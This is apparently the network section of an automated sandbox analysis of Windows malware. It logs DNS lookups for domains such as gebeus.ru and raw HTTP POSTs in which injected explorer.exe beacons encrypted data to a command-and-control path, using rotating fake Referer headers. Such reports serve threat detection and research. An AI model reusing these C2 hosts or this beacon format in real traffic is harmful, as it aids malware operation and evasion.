                                      Jul 15, 2024 06:10:34.247716904 CEST53533601.1.1.1192.168.2.5
                                      Jul 15, 2024 06:10:34.247730017 CEST53533601.1.1.1192.168.2.5
                                      Jul 15, 2024 06:11:13.240618944 CEST5757053192.168.2.51.1.1.1
                                      Jul 15, 2024 06:11:13.277544022 CEST53575701.1.1.1192.168.2.5
                                      Jul 15, 2024 06:11:24.385991096 CEST5639153192.168.2.51.1.1.1
                                      Jul 15, 2024 06:11:24.394428968 CEST53563911.1.1.1192.168.2.5
                                      Jul 15, 2024 06:13:04.198004961 CEST6407953192.168.2.51.1.1.1
                                      Jul 15, 2024 06:13:05.200898886 CEST6407953192.168.2.51.1.1.1
                                      Jul 15, 2024 06:13:06.200861931 CEST6407953192.168.2.51.1.1.1
                                      Jul 15, 2024 06:13:06.578305960 CEST53640791.1.1.1192.168.2.5
                                      Jul 15, 2024 06:13:06.578407049 CEST53640791.1.1.1192.168.2.5
                                      Jul 15, 2024 06:13:06.578444004 CEST53640791.1.1.1192.168.2.5
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 15, 2024 06:10:28.758306026 CEST192.168.2.51.1.1.10xa063Standard query (0)evilos.ccA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:29.770390987 CEST192.168.2.51.1.1.10xa063Standard query (0)evilos.ccA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:31.893166065 CEST192.168.2.51.1.1.10x9bfdStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:32.904093981 CEST192.168.2.51.1.1.10x9bfdStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:33.919715881 CEST192.168.2.51.1.1.10x9bfdStandard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:11:13.240618944 CEST192.168.2.51.1.1.10xf60cStandard query (0)mussangroup.comA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:11:24.385991096 CEST192.168.2.51.1.1.10xa15cStandard query (0)FibtGXfABKPepIBYktzWGsNQQZ.FibtGXfABKPepIBYktzWGsNQQZA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:04.198004961 CEST192.168.2.51.1.1.10x2467Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:05.200898886 CEST192.168.2.51.1.1.10x2467Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.200861931 CEST192.168.2.51.1.1.10x2467Standard query (0)gebeus.ruA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 15, 2024 06:10:29.866760015 CEST1.1.1.1192.168.2.50xa063No error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:29.866871119 CEST1.1.1.1192.168.2.50xa063No error (0)evilos.cc127.0.0.127A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru181.128.64.200A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247685909 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru220.125.3.190A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru181.128.64.200A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247716904 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru220.125.3.190A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru181.128.64.200A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:10:34.247730017 CEST1.1.1.1192.168.2.50x9bfdNo error (0)gebeus.ru220.125.3.190A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:11:13.277544022 CEST1.1.1.1192.168.2.50xf60cNo error (0)mussangroup.com185.149.100.242A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:11:24.394428968 CEST1.1.1.1192.168.2.50xa15cName error (3)FibtGXfABKPepIBYktzWGsNQQZ.FibtGXfABKPepIBYktzWGsNQQZnonenoneA (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru220.125.3.190A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578305960 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru181.128.64.200A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru220.125.3.190A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578407049 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru181.128.64.200A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru186.101.193.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru220.125.3.190A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru58.151.148.90A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru211.168.53.110A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru190.159.30.35A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru190.147.128.172A (IP address)IN (0x0001)false
                                      Jul 15, 2024 06:13:06.578444004 CEST1.1.1.1192.168.2.50x2467No error (0)gebeus.ru181.128.64.200A (IP address)IN (0x0001)false
                                      • mussangroup.com
                                      • qydxnaxywntsme.net
                                        • gebeus.ru
                                      • doqnumhybayljg.net
                                      • pqbpwctaxuyno.net
                                      • ktdmwvwgrxicbyf.net
                                      • xjvjtoqsxecwt.com
                                      • ikgaobomjngh.net
                                      • dshprjrooia.net
                                      • gejkxdmasvmxo.com
                                      • jqchsaraxkauihtq.org
                                      • 77.221.157.163
                                      • gxmmgqbcaaod.net
                                      • xlokwbpjnmjelwgt.net
                                      • ndqtpbgfxigpiob.net
                                      • jklgsoopefuhj.net
                                      • cjmjmjmgugawaqj.org
                                      • hurkgkiufjdhatw.org
                                      • twuefpujaurvfca.com
                                      • ewsnnfxrccp.org
                                      • aeqbmojsaplkjy.com
                                      • qhngbjsxhdjts.net
                                      • vahxvallvgf.net
                                      • 46.246.96.149
                                      • evdyuckmovmlgw.com
                                      • yxdvfnljluug.org
                                      • hocvueqllial.net
                                      • kojxnjsmgyh.net
                                      • woemrmcgjefexq.net
                                      • wkabmnjjuon.org
                                      • ifgnsbejriuwteg.com
                                      • dxpeojjvxfrbjrw.net
                                      • rklgpmbjqrvbpp.com
                                      • ddxjeoahbwmlur.com
                                      • gdirqpperuo.org
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.54971358.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:34.254204988 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://qydxnaxywntsme.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 126
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:10:34.254219055 CEST126OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 40 fa 87
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vus@d.zyS2pP@-sYFM
                                      Jul 15, 2024 06:10:36.298791885 CEST152INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:35 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 04 00 00 00 72 e8 85 ef
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.54971458.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:36.309231997 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://doqnumhybayljg.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 156
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:10:36.309273005 CEST156OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 4e 32 f8 91
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vuN2YSnnNw47e_9}^L+R)77Wi55ySc
                                      Jul 15, 2024 06:10:37.801022053 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:37 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.54971558.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:37.809750080 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://pqbpwctaxuyno.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 116
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:10:37.809750080 CEST116OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 20 3e ce fc
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu >TTe{u>T4ovSy
                                      Jul 15, 2024 06:10:39.938093901 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:39 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.54971658.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:39.948596954 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ktdmwvwgrxicbyf.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 198
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:10:39.948626995 CEST198OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 26 47 e2 8e
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu&GIzxDH@;,h0n>24w K\l)O3M/Ka,f1d5N=Pd_-
                                      Jul 15, 2024 06:10:41.435642958 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:41 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.54971758.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:41.445775032 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://xjvjtoqsxecwt.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 331
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:10:41.445808887 CEST331OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7c 24 e8 9a
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA -[k,vu|$oL`b$(\!dw,*z_sA7JP~Z\ZZIOB8+uBl6p`Wj-g;2u
                                      Jul 15, 2024 06:10:43.023338079 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:10:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.54971858.151.148.90801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:10:43.032114983 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ikgaobomjngh.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 162
                                      Host: gebeus.ru
